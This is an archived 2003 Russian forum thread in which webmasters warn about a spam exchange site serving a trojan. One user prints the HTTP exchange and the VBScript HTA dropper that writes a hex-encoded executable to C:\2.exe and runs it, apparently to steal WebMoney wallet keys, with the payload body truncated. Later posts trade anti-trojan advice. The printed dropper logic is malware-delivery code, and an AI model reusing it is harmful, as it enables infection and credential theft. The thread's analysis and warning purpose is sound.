Master-X
Форум | Новости | Статьи
Главная » Форум » Читеры и Разгильдяи » 
Тема: В связи с устареванием топик заархивирован
цитата
16/10/03 в 20:05
 Tekken
В связи с устареванием топик заархивирован

Последний раз редактировалось: Tekken (16/05/19 в 14:10), всего редактировалось 1 раз
цитата
16/10/03 в 21:25
 jurar1
мне спам от них пришел ..
Достойная альтернатива фетхарду , эквадору и тд ...

бля сходил туды - стоит какая то ебань -- вклад ВМ под проценты ..
Уроды короче...
цитата
17/10/03 в 00:01
 kassander


Мне тоже спам пришел icon_sad.gif Суки, имхо с форума адресов надыбали icon_sad.gif
цитата
17/10/03 в 00:48
 Solarix
вот придурки wmexchanges.com, тоже спамом завалили. ладно ещё спам, но трояны то зачем вешать...
цитата
17/10/03 в 04:04
 Pentarh
Ну эт ты зря эту ссылку запостил.

На странице такая хрень:
Код:

<object DATA="order_form03.php">


Итак, обращаемся:

Код:

GET /order_form03.php HTTP/1.1
HOST: wmexchanges.com



Получаем:

Код:

HTTP/1.1 200 OK

Date: Fri, 17 Oct 2003 00:57:14 GMT
Server: Apache/1.3.27 (Unix) mod_log_bytes/0.3 FrontPage/5.0.2.2510 PHP/4.3.2 mod_ssl/2.8.14 OpenSSL/0.9.7b
X-Powered-By: PHP/4.3.2
Content-disposition: inline; filename=1.htm
Сontent-Type: application/hta

<SCRIPT language=vbs>
self.MoveTo 6000,6000
set a=CreateObject("Scripting.FileSystemObject")
set b=a.CreateTextFile("C:\2.exe",1)
b.write(H("4D5A50000200000004000F00FFFF0000B80000000000000040001A000000"))
//..
//Дальше охиренно длинный кусок BASE64-кода в этом стиле
//..
b.Write(H(""))
b.Close
Set shell = CreateObject("WScript.Shell")
shell.run("C:\2.exe")

Function H(H1)
Dim H2
Dim H3:H2=""
For H3=1 To Len(H1) Step 2
H2=H2&Chr("&h"&Mid(H1,H3,2))
Next
H=H2
End Function
</SCRIPT>


Троянец банальный, при нормальном уровне безопасности и пропатченном ИЕ запуститься не должен.
Скорей всего пиздит что-то связанное в кипером.

ЗЫ: стрелять таких надо.
цитата
17/10/03 в 04:24
 Pentarh
Пиздец котенку - отосрался.

В течении бизнес-дня его прикроют нах.
Чмо ебаное. Ебаное чмо.
цитата
17/10/03 в 05:20
 BerWe


Не ругайся ты так... а то на всех таких уродов не хватит выражений...

Троян - пионерит ключи и кошельки к киперу вместе с паролями %)
И вместе с этим - еще все полезное, что сможет утянуть %)
цитата
17/10/03 в 10:30
 Man
Банальный вопрос, но все же.
Как лучше (и чем) защищатся от троянов и как выявить его присутствие в системе?
цитата
17/10/03 в 12:37
 Tekken
Pentarh писал:
Ну эт ты зря эту ссылку запостил.


правда чтоль?
если ты не заметил, то ссылка брокен, плюс еще предупреждение отписано.
цитата
17/10/03 в 12:40
 Austerlitz
Цитата:

Банальный вопрос, но все же.
Как лучше (и чем) защищатся от троянов и как выявить его присутствие в системе?


Патчи всякие вовремя ставить.
цитата
17/10/03 в 16:09
 Pentarh
Tekken писал:
Pentarh писал:
Ну эт ты зря эту ссылку запостил.


правда чтоль?
если ты не заметил, то ссылка брокен, плюс еще предупреждение отписано.


Хе-хе. Ну дык я ж постарался :-)

Прикрыли шарманку уже.
цитата
17/10/03 в 16:14
 Pentarh
Man писал:
Банальный вопрос, но все же.
Как лучше (и чем) защищатся от троянов и как выявить его присутствие в системе?


Лично я наизусть знаю список процессов, которые должны быть.
Все что появляется лишнее, я тщательно изучаю и при этом смотрю в реестровые записи автозагрузки.
От троянов лучшая защита - правильно настроенный файрвол. Я юзаю At-Guard. У меня кстати коллекция уже троянов. Файрвол вовремя предупреждает. Потом я вычисляю трояна, убираю из системы и добавляю в коллекцию :-)

AVP, Symantec Antivirus - все хирня. Систему тормозят ПЦ. Уж лучше ручками :-)

Разве что в таких ситуациях, когда вирь поражает системные файлы исполняемые - тогда уж можно и антивирем пройтись.
цитата
17/10/03 в 16:34
 Tekken
Pentarh писал:
Tekken писал:
Pentarh писал:
Ну эт ты зря эту ссылку запостил.


правда чтоль?
если ты не заметил, то ссылка брокен, плюс еще предупреждение отписано.


Хе-хе. Ну дык я ж постарался :-)
Прикрыли шарманку уже.


я про то что вместо http, написано hххp.
а что постарался, так молодец. еще один пиксель к твоей пиписке, эт я про рейтинг icon_smile.gif
цитата
17/10/03 в 16:43
 Pentarh
Не, нихера. Еще пока не прикрыли.

ipowerweb.com - мутная какая-то контора. Их тоже стрелять наверно надо smail43.gif
Для того, чтобы написать письмо саппорту, мне пришлось зарегистрироваться (!), просмотреть кучу пиздатых "BEST OFFERS", поискать категорию вопроса, который я хотел задать (так и ненашел абуз никаких), ввести вопрос, нажать кнопку Сабмит.
Потом мне было предложено поискать мой вопрос в FAQ и если его там нету, тогда нажать еще раз Сабмит и подтвердить мой вопрос.

Вот бля уроды!
цитата
19/10/03 в 18:20
 som
Обычные дебилы - уроды.. И хостинг себе выбрали соответсвующий..
Надо сказать у них несколько разных урлов - и постоянно делают новые когда у них закрывают старые..
цитата
19/10/03 в 18:38
 kodek
Man писал:
Банальный вопрос, но все же. Как лучше (и чем) защищатся от троянов и как выявить его присутствие в системе?

Я так понимаю тут нужно комплексно подходить. [1] Апдейты регулярные виндуза, раз в неделю обязательно. Хотя бы проверить, нет ли чего нового. [2] Фаервол хороший, смотреть кто куда ломится и с какого перепуга. [3] Монитор антивирусный, что файлы при открытии проверяет, типа касперского. [4] Собственно антивирус, чтобы вычищать то, что проскочило мимо монитора. [5] Ну и ad-aware на всякий пожарный, тоже находит много всякого барахла.

На самом деле такое впечатление, что всякой дряни стало на порядок больше в инете. И чем дальше тем хуже становится icon_sad.gif
цитата
19/10/03 в 19:40
 Pentarh
Ну я лично большой противник антивирусов - уж конкретно они тачку гальмуют все эти мониторы и т.п. Юзаю только в крайних случаях.

А вообще лучшая защита - уметь отличать плохое от хорошего.
Я например трояны за версту чую :-)


Эта страница в полной версии